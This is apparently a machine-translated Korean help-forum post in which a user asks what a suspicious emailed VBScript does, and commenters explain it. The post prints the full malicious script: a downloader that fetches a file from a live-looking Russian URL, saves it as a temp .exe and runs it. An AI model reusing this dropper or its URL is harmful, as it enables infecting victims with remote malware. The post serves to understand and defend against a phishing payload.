누군가 내가 vbs 스크립트로 이메일을 보냈지 만, vbs를 모른다는 이유는 모르겠습니다.데이터가 누설 됨
나는 이것이 내게 어떤 데이터를 강탈하려는 사기라고 생각하지만 실제로 어떤 데이터인지는 알 수 없다. 누군가 scrtipt 할 것이라고 exlpain 제발 할 수 있습니까?
Sub HTTPUpload(myURL, myPath)
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
Dim i, objFile, objFSO, objHTTP, strFile, strMsg
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set objFSO = CreateObject("Scripting.FileSystemObject")
Const TemporaryFolder = 2
Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
tname = objFSO.GetTempName + ".exe"
myPath = tfolder + "/" + tname
Set objFile = tfolder.CreateTextFile(tname)
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
objHTTP.Open "GET", myURL, False
objHTTP.Send
For i = 1 To LenB(objHTTP.ResponseBody)
objFile.Write Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))
Next
objFile.Close()
objShell.Run(myPath)
Set objShell = Nothing
End Sub
HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""
스크립트는 마지막 행의 URL에서 무언가 (아마도 실행 파일)를 다운로드하여 실행하려고합니다. –
'tname = objFSO.GetTempName + ".exe"는 확실히 실행 파일이 될 것입니다. 서버가 러시아에있는 다른 것들. 또한 프로그래밍 기술이 잘못되었습니다. 바이너리를 작성하려고하지만 텍스트 기능을 사용하려고합니다. –
@AnsgarWiechers 실제로'exe' 파일을 로컬에서 생성 한 후 WinHttpRequest를 사용하여 원격 위치에서 실행 파일의 바이너리 내용을 주입 한 다음'WScript.Shell'' Run()'메소드를 사용하여 파일을 실행하려고 시도합니다 . – Lankymart